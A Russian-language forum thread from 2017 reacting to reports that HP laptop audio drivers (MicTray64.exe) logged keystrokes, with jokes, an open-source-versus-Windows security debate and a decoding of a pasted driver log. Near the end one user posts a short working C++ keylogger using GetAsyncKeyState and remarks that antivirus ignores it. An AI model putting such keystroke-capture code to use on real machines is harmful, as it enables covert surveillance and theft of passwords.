Тотальная слежка: Драйвера для звуковых карт в ноутбуках НР вот уже два года поставляются со встроенным кейлоггером

Страницы: 1 2 3 4  ОТВЕТИТЬ НОВАЯ ТЕМА
nemecc 16 мая 2017 г. в 16:43
Праведное Зло  •  На сайте 12 лет
0
Боже да всем насрать! Я уже давно понял, что в нынешнем мире, чем меньше хранишь на компе тем лучше. Максимум на ЯПе темы позырить и список продуктов для магаза! :)
666Ghost666 16 мая 2017 г. в 16:54
ctrl+c ctrl+v  •  На сайте 14 лет
0
Цитата (ciph @ 16.05.2017 - 09:50)
Ужас! zombie.gif Это получается что меня слышали когда я фапал перед ноутом?? faceoff.gif

Если камеру не заклеил, то ещё и видели.
bay12 16 мая 2017 г. в 17:03
Балагур  •  На сайте 9 лет
0
Цитата (Primus525 @ 16.05.2017 - 14:55)
Цитата (Stapleton @ 16.05.2017 - 09:37)
А почему этим занимается звуковой драйвер, а не клавиатурный? Где логика?

звуковой драйвер ловит хоткеи, чтоб управлять звуком.

Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?
Валеха 16 мая 2017 г. в 17:20
Ярила  •  На сайте 12 лет
0
Цитата (vic4884 @ 16.05.2017 - 08:00)
вот не зря я никогда не любил ноутбуки HP...не зря

А я доволен HP, и такой хуйни файлов не нашёл why.gif Да и похуй-Винда похлеще сексотит, и ничего, всем похуй cool.gif
brync 16 мая 2017 г. в 17:26
Ярила  •  На сайте 15 лет
0
Цитата (Ficus @ 16.05.2017 - 09:16)
Цитата (БелыеТапочки @ 16.05.2017 - 08:07)
Цитата
Пойду на всякий случай ноут выкину.

Я ещё и кабель ростелекомовский рубанул,шоб на 100 % ваще всё.

Не надо нагнетать. Все это делается для нашего же блага, в целях борьбы с международным терроризмом. Как известно, Аль-Кайда и Игил питают слабость к технике HP. Вот американская компания и приняла меры, чтобы собирать пароли с пользователей. Таким образом, АНБ скоро найдет пароли террористческий ячеек, засевших в США и Еворпе и готовящих теракты против невинных людей.

Ага!
Эти злодеи вообще к любой технике тяготеют! rulez.gif
И на iOs'e, и на Винде, и на Андроиде...
Полигамные техникофилы, а не воины Аллаха! gigi.gif

Это сообщение отредактировал brync - 16 мая 2017 г. в 17:26
Гуракча 16 мая 2017 г. в 17:55
Хохмач  •  На сайте 9 лет
0
Цитата (bay12 @ 16.05.2017 - 17:03)
Цитата (Primus525 @ 16.05.2017 - 14:55)
Цитата (Stapleton @ 16.05.2017 - 09:37)
А почему этим занимается звуковой драйвер, а не клавиатурный? Где логика?

звуковой драйвер ловит хоткеи, чтоб управлять звуком.

Это-то понятно. Не понятно, зачем он его в файл пишет) Вот тут-то и закрадываются нехорошие подозрения)) Ну слушаешь ты нажатые клавиши, услышал ненужные - пофиг, услышал нужную - выполнил действие. Писать-то это все зачем?

не успевает, панимаш, пока кнопа нажалась, надо сделать соответствующее событие. В этот момент снова кнопа нажалась, пока делалось событие, прога пропустила нажатие следующей кнопы и программа облажалась, чё не понятно? Надо записывать, потом неспешно все события выпонять, мало ли... rulez.gif
Seguramigo 16 мая 2017 г. в 18:24
Ярила  •  На сайте 10 лет
0
Еще не набежали "кому-мы-нужны-это-все-шизофрения"? )))))
Странно))))) Я думал, что они всегда, даже не по теме доказывают, что все сделанное - для удобства пользователя. Хотя, в целом они правы, вопрос только для какого пользователя)))))
lumy 16 мая 2017 г. в 18:28
Говорящий с облаками  •  На сайте 13 лет
1
Цитата (Стоматолог @ 16.05.2017 - 14:26)
Кейлоггер может с завода стоять закладкой хоть в южном мосту,
хоть в любом официальном драйвере, в любой официальной программе.
Хоть даже в Амиго и Яндек-Баре.

Ты че сказал, нехристь?! С Амиго такого быть не может!!!
Amok555 16 мая 2017 г. в 18:32
Ярила  •  На сайте 17 лет
1
Цитата (Narkozzz @ 16.05.2017 - 10:48)
Amok555
Цитата
Открытый код все-таки это открытый код.

Ага, если только у тебя весь софт собран тобою из кода, который ты смотрел. Стоит на сутки заменить код в репозитории на исправленный, а потом вернуть назад чистый - и тысячи ничего не подозревающих юзеров получат софт из открытого кода с трояном. И потом - кто контроллирует сборщиков пакетов для дистрибутивов? Что толку от открытого кода, если ты поставил из пакета?

Ага. А ты попробуй этот код вернуть)) Я же спецом написал - стейбл. Это даже не анстейбл будет, а экспериментал. Проверяют и постят все ментейнеры. Они же повышают ранг дистрибутива после тестов. Там все не так просто. "Изменить" не прокатит. А код видят тысячи пользователей, которые знают как его читать - поэтому да, отчасти стабильный открытый код - наилучшая гарантия.
lumy 16 мая 2017 г. в 18:34
Говорящий с облаками  •  На сайте 13 лет
1
Цитата (Narkozzz @ 16.05.2017 - 14:49)
Миллхэвен
Цитата
А уж если очень надо зашифроваться, то реализовать гостовый алгоритм - не сверхсложная задача. Зато в нем нет бекдоров.

Так и надежность его для профессионала будет низкой, если вы конечно не из тех единиц математиков-криптографов.

Дааа? Вот сейчас по всему миру заплакали жертвы всех Рансомов вообще и ВоннаКрай персольнально. Они все используют штатное шифрование винды и хер ты это PGP откроешь. точнее, если откроешь, то Нобелевская Премия Мира гарантирована (за вклад в математику нету).

ЗЫ Точнее теория не запрещает, но таких вычислительных мощностей нет в сумме. Хоть всеми компами и смартами считай. А если вдруг появятся, то увеличат длинну ключа и опять писец-невскрываемо. Только брутфорс. Алгоритма нет чисто из теории.

ЗЗЫ 4линуксоиды. PGP придумывалось под UNIX- у вас точно такой же модуль шифрования, только права получить сложнее (и то уже не факт). В винде воще дофига всего сперто из униха. Начинаешь отслеживать зависимости: класс-обертка, в нем еще обертка, в нем еще 5... "бля, я это уже видел!"- стандартный никсовый tcpip.h (даже коменты теже стоят, сравнивал с тем же хидером в QNX)...

Это сообщение отредактировал lumy - 16 мая 2017 г. в 18:55
organica 16 мая 2017 г. в 18:35
Ярила  •  На сайте 13 лет
0
охоспади! вы ещё про пунтосвичер расскажите, новость, тоже блин...
по факту - мы все умрём, ну а пока я схожу посру deg.gif
Amok555 16 мая 2017 г. в 18:43
Ярила  •  На сайте 17 лет
0
Цитата (gala1186 @ 16.05.2017 - 10:25)
Файлик лог есть, но кто сможет это понять? вот например кусочек:

MicTray64.exe(tid 994) 10:[ J_DEVICE] - GetSettingsFromRegistry

MicTray64.exe(tid 994) 10:[ J_DEVICE] - RegOpenKey is 2
MicTray64.exe(tid 994) 10:[ J_DEVICE] - GetSettingsFromRegistry

MicTray64.exe(tid 994) 10:[ J_DEVICE] - RegOpenKey is 2
MicTray64.exe(tid 994) 20:[ J_DEVICE] - Attempt to Register the device notification.

MicTray64.exe(tid 994) 20:[ J_DEVICE] - RegisterDeviceNotification() successfully.

MicTray64.exe(tid 994) 20:[ J_DEVICE] - OnDeviceChanged OpenDevice

MicTray64.exe(tid 994) 1206:[ J_DEVICE] - RegisterUnloadEvent

MicTray64.exe(tid 994) 1206:[ J_DEVICE] - Attempt to Register Unload Event.

MicTray64.exe(tid 994) 1206:[ J_DEVICE] - RegisterUnloadEvent() successfully.

MicTray64.exe(tid 994) 1471:[ J_STATE] - Multistream mode 1
MicTray64.exe(tid 994) 1471:[ J_STATE] - Get Invalid handle
MicTray64.exe(tid 994) 8834:[ J_WMSG] - WM_DEVICECHANGE message received

MicTray64.exe(tid 994) 104946:[ J_STATE] - Mic target 0x1 scancode 0x13 flags 0x0 extra 0x0 vk 0x52

MicTray64.exe(tid 994) 105008:[ J_STATE] - Mic target 0x1 scancode 0x13 flags 0x80 extra 0x0 vk 0x52

MicTray64.exe(tid 994) 105070:[ J_STATE] - Mic target 0x1 scancode 0x16 flags 0x0 extra 0x0 vk 0x55

MicTray64.exe(tid 994) 105133:[ J_STATE] - Mic target 0x1 scancode 0x16 flags 0x80 extra 0x0 vk 0x55

MicTray64.exe(tid 994) 105570:[ J_STATE] - Mic target 0x1 scancode 0x2e flags 0x0 extra 0x0 vk 0x43

MicTray64.exe(tid 994) 105616:[ J_STATE] - Mic target 0x1 scancode 0x2e flags 0x80 extra 0x0 vk 0x43

MicTray64.exe(tid 994) 105913:[ J_STATE] - Mic target 0x1 scancode 0x23 flags 0x0 extra 0x0 vk 0x48

MicTray64.exe(tid 994) 105960:[ J_STATE] - Mic target 0x1 scancode 0x23 flags 0x80 extra 0x0 vk 0x48

MicTray64.exe(tid 994) 111045:[ J_STATE] - Mic target 0x1 scancode 0x2a flags 0x0 extra 0x0 vk 0xa0

Тут не все, да?) Все доступно и понятно.

Получение ключей из реестра. Как только девайс начинает юзаться открываем его, отключаем события, включаем режим оповещения дополнительного устройства (программы), дальше должно быть что-то вроде RegisterLoadEvent и дальнейшая работа)

Все это - названия вызываемых функций.

Ну и настройка регистров ниже)
BoaSoft 16 мая 2017 г. в 19:13
Ярила  •  На сайте 12 лет
1
Цитата (gala1186 @ 16.05.2017 - 10:25)
Файлик лог есть, но кто сможет это понять? вот например кусочек:
successfully.

MicTray64.exe(tid  994) 104946:[  J_STATE] - Mic target 0x1 scancode 0x13 flags 0x0 extra 0x0 vk 0x52

MicTray64.exe(tid  994) 105008:[  J_STATE] - Mic target 0x1 scancode 0x13 flags 0x80 extra 0x0 vk 0x52

MicTray64.exe(tid  994) 105070:[  J_STATE] - Mic target 0x1 scancode 0x16 flags 0x0 extra 0x0 vk 0x55

MicTray64.exe(tid  994) 105133:[  J_STATE] - Mic target 0x1 scancode 0x16 flags 0x80 extra 0x0 vk 0x55

MicTray64.exe(tid  994) 105570:[  J_STATE] - Mic target 0x1 scancode 0x2e flags 0x0 extra 0x0 vk 0x43

MicTray64.exe(tid  994) 105616:[  J_STATE] - Mic target 0x1 scancode 0x2e flags 0x80 extra 0x0 vk 0x43

MicTray64.exe(tid  994) 105913:[  J_STATE] - Mic target 0x1 scancode 0x23 flags 0x0 extra 0x0 vk 0x48

MicTray64.exe(tid  994) 105960:[  J_STATE] - Mic target 0x1 scancode 0x23 flags 0x80 extra 0x0 vk 0x48

MicTray64.exe(tid  994) 111045:[  J_STATE] - Mic target 0x1 scancode 0x2a flags 0x0 extra 0x0 vk 0xa0


scancode 0x2a - то, чтотдравер клавы выдает.

extra 0x0 - скорее всего сочтояния модификаторов (шифт-контрол итд)

vk 0x52 - код клавиши

flags 0x80 - нажатие
flags 0x80 - отпускание

Кусок из Winapi.Windows;

Код

VK_INSERT = vkInsert; {45}
 {$EXTERNALSYM VK_DELETE}
 VK_DELETE = vkDelete; {46}
 {$EXTERNALSYM VK_HELP}
 VK_HELP = vkHelp; {47}
{ VK_0 thru VK_9 are the same as ASCII '0' thru '9' ($30 - $39) }
{ VK_A thru VK_Z are the same as ASCII 'A' thru 'Z' ($41 - $5A) }
 {$EXTERNALSYM VK_LWIN}
 VK_LWIN = vkLWin; {91}
 {$EXTERNALSYM VK_RWIN}
 VK_RWIN = vkRWin; {92}

Это сообщение отредактировал BoaSoft - 16 мая 2017 г. в 19:16
CrazyDoppel 16 мая 2017 г. в 19:22
Хохмач  •  На сайте 12 лет
2
Цитата (Amok555 @ 16.05.2017 - 10:08)
Цитата (Narkozzz @ 16.05.2017 - 09:35)
BattlePorQ
Цитата
Вместо стандартных драйверов в ядре linux )

Вы давно делали ревизию кода всех установленных у вас приложений и ядра?

Открытый код все-таки это открытый код. Всегда можно прочесть что там нафигачено. Таких двухлетних косяков в таком софте - не будет (ок, пусть будет корректнее - вероятность их крайне мала). Достаточно пользоваться стейбл версией и будет все норм) Не обязательно для этого каждому пользователю при каждой загрузке весь код операционки перелопачивать)

У линукса все-же немного другой подход к безопасности.

Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed gigi.gif
coolerok 16 мая 2017 г. в 19:33
Хохмач  •  На сайте 14 лет
0
Цитата (Jus @ 16.05.2017 - 15:56)
Что касается компании HP, то ее представители уже ознакомились с проблемой и заявили, что сотрудники ликвидируют проблему в ближайшее время. «Мы нашли решение и сделаем его доступным для наших пользователей», — заявили в компании.

Они, блядь, ознакомились с проблемой! Хуйли с ней знакомиться - она у вас (я про компанию) в технической документации подробно описана. Но особо эпично то, что эти ахуевшие нашли решение! Они нашли его, Ганс! (карл заебал уже). Небось месяц думали - как бы, блядь, решить эту нетривиальную проблему. Да просто - выпилить нахуй этот функционал и все.

Нихуя не удивлюсь, если выпиливание функционала сводится к закомментированию одной строчки кода:

// auto keyLogger = new KeyLogger();

Вот же гандоны какие, а...
пидагок 16 мая 2017 г. в 19:40
Ярила  •  На сайте 20 лет
1
Первым делом довольный покупатель ноутбука что делает? Заклеивает веб-камеру!
Spawn2010 16 мая 2017 г. в 19:41
Весельчак  •  На сайте 10 лет
1
LINUX X U B U N T U у меня, прочитал слово в виндовс и успокоился )

Это сообщение отредактировал Spawn2010 - 16 мая 2017 г. в 19:42
gnombliad 16 мая 2017 г. в 19:46
Ярила  •  На сайте 10 лет
0
Хорошо что мой HP сдох нахуй gigi.gif
Amok555 16 мая 2017 г. в 20:09
Ярила  •  На сайте 17 лет
0
Цитата (CrazyDoppel @ 16.05.2017 - 19:22)
Цитата (Amok555 @ 16.05.2017 - 10:08)
Цитата (Narkozzz @ 16.05.2017 - 09:35)
BattlePorQ
Цитата
Вместо стандартных драйверов в ядре linux )

Вы давно делали ревизию кода всех установленных у вас приложений и ядра?

Открытый код все-таки это открытый код. Всегда можно прочесть что там нафигачено. Таких двухлетних косяков в таком софте - не будет (ок, пусть будет корректнее - вероятность их крайне мала). Достаточно пользоваться стейбл версией и будет все норм) Не обязательно для этого каждому пользователю при каждой загрузке весь код операционки перелопачивать)

У линукса все-же немного другой подход к безопасности.

Ну да, потому весь мир сидел с 11 до 14 год с дырой размером с жопу порно-актрисы aka heartbleed gigi.gif

Не без этого)) Бывают и такие косяки)
Narkozzz 16 мая 2017 г. в 20:24
Гойдофоб  •  На сайте 15 лет
0
Amok555
Так что тысячи глаз и стейбл - не гарантия.

lumy
Речь выше шла о самописных алгоритмах, а не технологическом стандарте. С технологическим стандартом тоже все непросто - криптография наука сложная, алгоритм проверить на коллизии непросто
yukisaw 16 мая 2017 г. в 20:29
Ярила  •  На сайте 14 лет
0
Пфф, тоже мне открытие. Один фиг там каша из данных и выудить оттуда какую-то конкретную инфу тот еще гемор. Так что какой-либо взлом через это возможен только конкретно нацеленный, а если есть возможноть слямзить этот лог, то думаю можно найти возможность впаять нормальный кейлогер в систему.

Ну и так, для общего ознакомления - элементарнейший кейлогер на плюсах (тоже антивирям пофиг на такое поведение):

#include <iostream>
#include <Windows.h>

int main()
{
        bool keys[256] = { false };
        while (true)
        {
                int key_code = 0;
                for (bool& key : keys) key = GetAsyncKeyState(key_code++);
                for (char c = ' '; c <= 'z'; ++c) if (keys[c]) std::cout << c;
        }
}
horrordash 16 мая 2017 г. в 20:50
Ярила  •  На сайте 16 лет
0
когда-то давно, лет 10 назад поставил нам в контору HP партию десктопов, с предустановленной виндой. поскольку у нас винда корпоративная, предустановленную сносили и ставили свою. а я чего-то решил перед сносом заглянуть че там на винте, так вот при загрузке с CD появились папочки C:\FBI и C:\CIA которые в установленной родной винде никак не были видны :)
внутри программки... к сожалению не сохранил :(
americano 16 мая 2017 г. в 21:05
Ярила  •  На сайте 14 лет
0
Цитата (666Ghost666 @ 16.05.2017 - 16:54)
Цитата (ciph @ 16.05.2017 - 09:50)
Ужас! zombie.gif Это получается что меня слышали когда я фапал перед ноутом??  faceoff.gif

Если камеру не заклеил, то ещё и видели.

Я видел кино, которое также начиналось
Tigerchuk 16 мая 2017 г. в 21:08
Шутник  •  На сайте 10 лет
0
А чо будет? Кейлогер направит америкосам , ну или в HP или куда нить еще что вы ищете в поисковиках? Или пишете что кому?
AbnormalSys 16 мая 2017 г. в 21:24
Хохмач  •  На сайте 11 лет
0
HP elitedesk 800 + Дровлённый моник иховый E221c при коннекте ч-з цифру (или VGA+USB)

Вполне себе слушать и видеть юзеров позволяет, кста.. это фирменная ФИЧА!
Понравился пост? Ещё больше интересного в ЯП-Телеграм и ЯП-Max!
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей) Просмотры темы: 37 193
0 Пользователей:
Страницы: 1 2 3 4  ОТВЕТИТЬ НОВАЯ ТЕМА

 
 

Активные темы



Наверх